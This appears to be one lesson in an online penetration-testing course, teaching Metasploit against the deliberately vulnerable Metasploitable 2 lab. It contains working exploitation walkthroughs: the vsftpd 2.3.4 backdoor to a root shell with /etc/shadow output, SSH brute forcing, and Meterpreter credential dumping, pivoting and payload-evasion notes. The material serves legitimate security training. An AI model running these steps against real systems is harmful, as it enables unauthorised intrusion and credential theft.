🟣 PHASE 3 BEGINS — CORE ATTACK TECHNIQUES (DAYS 21–35)
Phase 2 gave you the web application layer. Phase 3 adds the infrastructure exploitation layer — Metasploit, network exploitation, post-exploitation, privilege escalation, pivoting, and Active Directory attacks. The tools and techniques professionals use when web vulnerabilities lead to deeper access.
⚖️
Authorised use only: All Metasploit demonstrations use Metasploitable 2 in your isolated lab. Using Metasploit against systems you don’t own or have explicit written permission to test is illegal under computer crime laws globally. The tool’s power is precisely why authorisation documentation is non-negotiable — every professional engagement starts with written scope before any Metasploit module runs.
21
Everything you’ve learned in the first 20 days was building to this moment. You understand networks. You understand web vulnerabilities. You understand the methodology. Now you get the tool that professional penetration testers use on virtually every infrastructure engagement — a framework containing over 2,400 exploits, integrated payloads, and a post-exploitation platform that turns a single vulnerable service into comprehensive server access.
Metasploit is not a magic button. Students who learn it before understanding the underlying concepts treat it as a black box. You’re different — you’ve spent 20 days building the foundation. Today Metasploit makes sense not just as a set of commands, but as a system whose design reflects exactly the attack concepts you’ve already internalised.
The Metasploit Framework was created by H.D. Moore in 2003 and acquired by Rapid7 in 2009. The Community and open-source versions remain free and are pre-installed on Kali Linux. Metasploit Pro (commercial) adds automation and reporting. For this course — and for most professional testing purposes — the open-source version is entirely sufficient.
Metasploit Architecture — Understanding What You’re Working With
Before touching the console, understand the structure. Metasploit is a modular framework — every capability is a module of a specific type. Knowing the module types tells you exactly where to look when you need a particular capability.
EXPLOIT
Takes advantage of a vulnerability. Requires a payload. Examples: MS17-010 (EternalBlue), vsftpd 2.3.4 backdoor.
AUXILIARY
Supporting tasks — scanners, fuzzers, brute forcers, sniffers. No payload required. Examples: port scanners, service version detectors.
PAYLOAD
What executes on the target after exploitation. Reverse shell, bind shell, Meterpreter, command execution, file operations.
POST
Post-exploitation modules — privilege escalation, credential dumping, lateral movement. Run after a Meterpreter session is established.
ENCODER
Transforms payloads to evade detection. Obfuscates the payload bytes. Shikata Ga Nai (x86) is the classic example.
NOP / EVASION
NOP sleds for buffer overflow exploits. Evasion modules generate AV-evasive executable payloads. Advanced use cases.
msfconsole — Navigation & Core Commands
msfconsole is the primary interface for the Metasploit Framework. It’s a command-line console with its own set of commands and tab-completion. Launch it from any Kali terminal and you’ll see the banner and the msf6 > prompt. Everything in Metasploit flows through this interface.
msfconsole — launching and essential navigation commands
# Launch Metasploit
msfconsole
# Or with database support enabled
msfdb init && msfconsole
# ── Core navigation commands ────────────────────────────────
help # Show all available commands
search vsftpd # Search modules by keyword
use 0 # Select module by index number from search results
use exploit/unix/ftp/vsftpd_234_backdoor # Select by full path
info # Show full module info (description, refs, options)
options # Show required and optional module options
show payloads # List compatible payloads for current exploit
set RHOSTS 192.168.56.101 # Set target IP
set LHOST 192.168.56.100 # Set your Kali IP (for reverse shells)
set LPORT 4444 # Set listener port
run # Execute the module (also: exploit)
back # Deselect current module, return to msf6 >
sessions # List all active sessions
sessions -i 1 # Interact with session 1
exit # Exit msfconsole
# ── Global options (set once, apply to all modules) ─────────
setg RHOSTS 192.168.56.101 # Global set (persists across modules)
setg LHOST 192.168.56.100
unsetg RHOSTS # Remove global setting
save # Save global settings to disk
💡 Tab completion is your best friend: msfconsole has full tab completion for module paths, option names, and commands. Type use exploit/ and press Tab twice to browse exploit categories. Type set R and press Tab to see all options starting with R. Never type full module paths from memory — tab-complete them.
The Core Workflow — Search → Use → Options → Set → Run
Every Metasploit engagement follows the same five-step pattern regardless of the target or vulnerability. Master this workflow and you’ll be comfortable with any module in the framework.
The five-step Metasploit workflow — annotated
# ── STEP 1: SEARCH ──────────────────────────────────────────
msf6 > search type:exploit name:vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
– —- ————— —- —– ———–
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No vsFTPd v2.3.4 Backdoor Command Execution
# Search operators
search type:exploit platform:linux rank:excellent
search cve:2017-0144 # EternalBlue by CVE
search name:samba # All Samba modules
# ── STEP 2: USE ─────────────────────────────────────────────
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
# Prompt changes — you’re now inside the module context
# ── STEP 3: OPTIONS ─────────────────────────────────────────
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes Target IP
RPORT 21 yes Target port (default 21)
# Required fields with no value must be set before running
# ── STEP 4: SET ─────────────────────────────────────────────
set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
# ── STEP 5: RUN ─────────────────────────────────────────────
run
[*] 192.168.56.101:21 – Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.56.101:21 – USER: 331 Please specify the password.
[+] 192.168.56.101:21 – Backdoor service has been spawned, handling…
[+] 192.168.56.101:21 – UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened
Auxiliary Modules — Scanning, Brute Force & Intelligence
Auxiliary modules are the reconnaissance and support layer of Metasploit. Before exploiting anything, you use auxiliaries to confirm service versions, brute force credentials, and gather the intelligence that informs which exploit to use. They follow the same search/use/options/run workflow — just without a payload.
Auxiliary modules — most useful examples for Metasploitable 2
# ── Port and service scanner ────────────────────────────────
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.56.101
set PORTS 1-1024
run
# ── SMB version scanner ─────────────────────────────────────
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.56.101
run
[*] 192.168.56.101:445 – Host is running Unix Samba 3.0.20-Debian
# → Samba 3.0.20 → search for Samba exploits next
# ── SSH brute force ─────────────────────────────────────────
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.56.101
set USERNAME msfadmin
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
set VERBOSE false
run
[+] 192.168.56.101:22 – Success: ‘msfadmin:msfadmin’ ‘uid=1000(msfadmin)…’
# ── HTTP version detection ──────────────────────────────────
use auxiliary/scanner/http/http_version
set RHOSTS 192.168.56.101
run
[*] 192.168.56.101:80 Apache/2.2.8 (Ubuntu) DAV/2
# ── FTP anonymous login check ───────────────────────────────
use auxiliary/scanner/ftp/anonymous
set RHOSTS 192.168.56.101
run
Your First Real Exploit — vsftpd 2.3.4 Backdoor on Metasploitable 2
The vsftpd 2.3.4 backdoor is one of the most famous vulnerabilities in penetration testing history — a malicious backdoor was inserted into the vsftpd source code in 2011. When you send a username containing a smiley face (:)), the backdoored version opens a shell on port 6200. Metasploitable 2 ships with this deliberately vulnerable version for exactly this kind of practice.
vsftpd 2.3.4 exploitation — full walkthrough on Metasploitable 2
# Step 1: Confirm vsftpd version via auxiliary module
msf6 > use auxiliary/scanner/ftp/ftp_version
msf6 > set RHOSTS 192.168.56.101
msf6 > run
[*] 192.168.56.101:21 – FTP Banner: ‘220 (vsFTPd 2.3.4)\r\n’
# Confirmed: vsFTPd 2.3.4 — backdoored version
# Step 2: Find and load the exploit
msf6 > search vsftpd 2.3.4
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
# Step 3: Review options and info
info
# Note: This module triggers the backdoor that was planted
# in vsftpd 2.3.4 — sends 🙂 in USER field, opens port 6200
# Step 4: Set target and run
set RHOSTS 192.168.56.101
run
[*] 192.168.56.101:21 – Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.56.101:21 – USER: 331 Please specify the password.
[+] 192.168.56.101:21 – Backdoor service has been spawned, handling…
[+] 192.168.56.101:21 – UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.56.100:41234 → 192.168.56.101:6200)
# Step 5: In the shell — you have root!
id
uid=0(root) gid=0(root)
hostname
metasploitable
cat /etc/shadow | head -5
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
# You have root access — can read shadow file (password hashes)
🎯 What just happened: In six commands you went from “target IP” to “root shell on a remote system.” The vulnerability did all the work — Metasploit simply automated the trigger. This is why Metasploitable 2 exists as a training target: to let you practice this workflow safely before applying it in authorised real-world assessments.
Payloads — What Executes After Exploitation
A payload defines what happens on the target machine after the exploit lands. Choosing the right payload is critical — it determines whether you get a basic shell, a Meterpreter session, or simply execute a single command. Understanding the three payload types is essential.
| Payload Type | How It Works | Pros / Cons | Example |
|---|
| Singles | Self-contained — entire payload in one block. No stage needed. | ✓ Reliable, no callback needed
✗ Larger, limited functionality | shell_bind_tcp |
| Stagers | Small initial payload that creates a connection, then downloads the stage. | ✓ Tiny initial size — fits tight spaces
✗ Requires two-stage delivery | windows/meterpreter/reverse_tcp |
| Stageless | Complete payload delivered at once — includes stager + stage together. | ✓ No callback needed, more reliable in filtered networks
✗ Larger payload size | windows/meterpreter_reverse_tcp |
Selecting and setting payloads — practical examples
# List compatible payloads for the current exploit
show payloads
# Set a specific payload
set payload cmd/unix/interact # Simple unix shell (for vsftpd)
set payload linux/x86/meterpreter/reverse_tcp # Meterpreter on Linux
set payload windows/meterpreter/reverse_tcp # Meterpreter on Windows
# Reverse vs bind — choosing connection direction
reverse_tcp # Target connects BACK to attacker (bypasses inbound firewall)
bind_tcp # Attacker connects TO target (requires open inbound port)
# Reverse TCP is used in the vast majority of real-world engagements
# Most targets have outbound connectivity but block inbound connections
# Naming convention: platform/arch/type/transport
linux / x86 / meterpreter / reverse_tcp
windows/ x64 / meterpreter / reverse_https
java / / meterpreter / reverse_tcp
Meterpreter — Post-Exploitation Powerhouse
Meterpreter is the most capable payload in Metasploit. Unlike a raw shell (which gives you a basic command prompt), Meterpreter runs entirely in memory, uses an encrypted channel, and provides a rich command set for post-exploitation. Once you have a Meterpreter session, you have a full toolkit running silently on the target.
Meterpreter — essential commands and capabilities
# ── System information ──────────────────────────────────────
sysinfo # OS, hostname, architecture, language
getuid # Current user (who are you?)
getpid # Process ID of Meterpreter
ps # List all running processes
ifconfig # Network interfaces (same as ipconfig on Windows)
arp # ARP table — reveals other hosts on network
route # Routing table — see internal network routes
# ── File system navigation ──────────────────────────────────
pwd # Current directory
ls # List files
cd /tmp # Change directory
download /etc/shadow /tmp/shadow.txt # Download file to Kali
upload /tmp/tool.sh /tmp/tool.sh # Upload file to target
search -f *.conf -d /etc # Search for config files
cat /etc/passwd # Read file contents
edit /etc/hosts # Edit file in vi
# ── Privilege escalation ────────────────────────────────────
getuid # Check current privilege level
getsystem # Attempt automatic privilege escalation (Windows)
run post/multi/recon/local_exploit_suggester # Suggest local exploits
# ── Credential harvesting ───────────────────────────────────
run post/linux/gather/hashdump # Dump /etc/shadow (Linux)
hashdump # Dump SAM hashes (Windows)
run post/windows/gather/credentials/credential_collector
# ── Shell and pivoting ──────────────────────────────────────
shell # Drop into native OS shell
Ctrl+Z # Background shell, return to Meterpreter
background # Background Meterpreter session
run autoroute -s 10.10.10.0/24 # Add route for pivoting
portfwd add -l 3389 -p 3389 -r 10.10.10.50 # Port forward through target
Session Management — Working with Multiple Shells
On a real engagement you’ll often have multiple active sessions — several exploited machines, multiple shell types, different privilege levels. Metasploit’s session management keeps them organised and lets you switch between them without losing any.
Session management — commands you’ll use on every engagement
# View all active sessions
sessions
Active sessions
===============
Id Name Type Info Connection
— —- —- —- ———-
1 shell unix uid=0(root) gid=0(r 192.168.56.100:4444 → 192.168.56.101:6200
2 meterpreter x86/linux msfadmin @ metaspl… 192.168.56.100:4445 → 192.168.56.101:45678
# Interact with a specific session
sessions -i 1 # Interact with session 1
sessions -i 2 # Interact with session 2
# Background a session (from within the session)
background # Returns to msf6 > prompt, session stays alive
Ctrl+Z # Same — background the current session
# Upgrade a shell session to Meterpreter
sessions -u 1 # Upgrade session 1 to Meterpreter
# Kill a session
sessions -k 1 # Kill session 1
sessions -K # Kill ALL sessions
# Run a module against an existing session
use post/linux/gather/hashdump
set SESSION 1
run
msfdb & Workspaces — Saving Your Work
Metasploit integrates with a PostgreSQL database to store all your scan results, discovered hosts, services, credentials, and notes. On a real engagement with dozens of hosts, this database becomes essential. Workspaces let you separate data from different engagements.
msfdb and workspace management
# Start/enable the database (one-time setup)
sudo msfdb init
msfconsole
db_status
[*] Connected to msf. Connection type: postgresql.
# Workspace management — separate engagements
workspace # List workspaces (* = current)
workspace -a metasploitable # Create new workspace
workspace metasploitable # Switch to workspace
# Import Nmap results directly into database
# First: run Nmap with XML output
nmap -sV -oX /tmp/scan.xml 192.168.56.101
# In msfconsole:
db_import /tmp/scan.xml
[*] Importing ‘Nmap XML’ data
[*] Import complete
# View discovered hosts and services
hosts # All discovered hosts
services # All discovered services
services -p 21 # Filter by port
creds # Captured credentials
notes # Your notes
vulns # Known vulnerabilities
# Run db_nmap directly from msfconsole
db_nmap -sV –open 192.168.56.101
# Results automatically saved to database
🎯 Day 21 Practical Task
📋 DAY 21 CHECKLIST — Metasploitable 2 Lab Only
1
Initialise msfdb and create a workspace for today’s lab
sudo msfdb init
msfconsole
workspace -a day21_lab
db_nmap -sV –open 192.168.56.101
hosts
services
How many open services does Metasploitable 2 expose? What do the service versions tell you about potential vulnerabilities?
2
Exploit vsftpd 2.3.4 and get a root shell
Follow the walkthrough above. Once in the root shell: run id, uname -a, and cat /etc/shadow | head -3. Screenshot the root shell — it’s your first real Metasploit exploitation proof.
3
Run three auxiliary modules against Metasploitable 2
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/anonymous
use auxiliary/scanner/ssh/ssh_login
What does each module reveal? Which of those findings could you use as an exploitation path? Document findings in your msfdb notes.
★
Find and exploit a second vulnerability on Metasploitable 2
Use the SMB version info to search for a Samba exploit: search samba 3.0.20. Find the “usermap_script” module. Run it against the target. Do you get a shell? What user are you running as? Compare the impact to the vsftpd exploit. Share your second shell with #Day21Done 🎯
⭐ BONUS CHALLENGE — Get a Meterpreter Session
After getting a basic shell from vsftpd or Samba, upgrade it to Meterpreter with sessions -u [id]. Once in the Meterpreter session, run sysinfo, download /etc/shadow to your Kali machine, and use run post/linux/gather/hashdump. How many password hashes can you collect? Which of those hashes might crack with Hashcat (Day 10)? Document the full chain: exploit → shell → Meterpreter → hashdump → crack.
🎯
You’ve exploited your first remote service.
Root shell, Meterpreter — the framework makes sense.
Day 22 goes deeper — exploitation techniques beyond Metasploit: manual exploit execution, understanding shellcode, working with public exploits from ExploitDB, and building the attacker instinct for when to use a framework and when to go manual. The techniques that take you from “script runner” to “security engineer.”
Day 22: Exploitation Techniques →
Frequently Asked Questions — Day 21
What is the difference between Metasploit Community and Metasploit Pro?
Metasploit Community (free, open-source) includes msfconsole, all exploit and auxiliary modules, Meterpreter, and the database. It’s everything needed for manual penetration testing and covers 95% of professional use cases. Metasploit Pro (commercial, ~$15,000/year) adds a web-based GUI, automated exploitation and discovery, reporting templates, phishing campaign management, MetaModules for automated tasks, and task scheduling. For learning and most professional assessments, Community is entirely sufficient.
Why does Metasploit use a module ranking system?
Module ranks indicate reliability from Excellent to Manual. Excellent means the exploit won’t crash the target and almost always works. Great means it works reliably with some environmental dependencies. Good means average reliability. Normal means some configurations work. Average and Low indicate unreliable exploits. Manual means it requires direct interaction. When choosing between modules, prefer higher-ranked ones — especially in production environments where crashing the target would be a significant problem. Always run info to read the full reliability notes before executing any exploit.
Why does Meterpreter run in memory?
Meterpreter runs entirely in memory — it never writes itself to disk, which makes it significantly harder to detect by antivirus software (which primarily scans files) and leaves minimal forensic evidence. It is injected directly into the exploited process rather than creating a new executable on disk. Communication uses an encrypted channel, making network traffic analysis more difficult. This memory-resident, in-process architecture is why Meterpreter is the preferred payload for real professional engagements where stealth matters.
How do I keep Metasploit updated?
On Kali Linux, run sudo apt update && sudo apt install metasploit-framework to update to the latest package version. Alternatively, msfupdate updates just Metasploit. New exploit modules are added regularly — particularly after major CVE disclosures. Keeping Metasploit updated is important because outdated versions may lack modules for recent vulnerabilities. In professional engagements, document the Metasploit version used in your methodology section.
ME
Mr Elite
Founder, SecurityElites.com | Penetration Tester | Educator
I remember the first time I got a root shell through Metasploit on a real engagement — the vsftpd module, exactly like today’s walkthrough, on a forgotten internal server running a decade-old Linux distro. Six commands from “what’s on this network” to “I’m root.” What made it meaningful wasn’t the tool — it was understanding exactly why it worked. That understanding is what you bring from Days 1–20 into every Metasploit session from here forward.
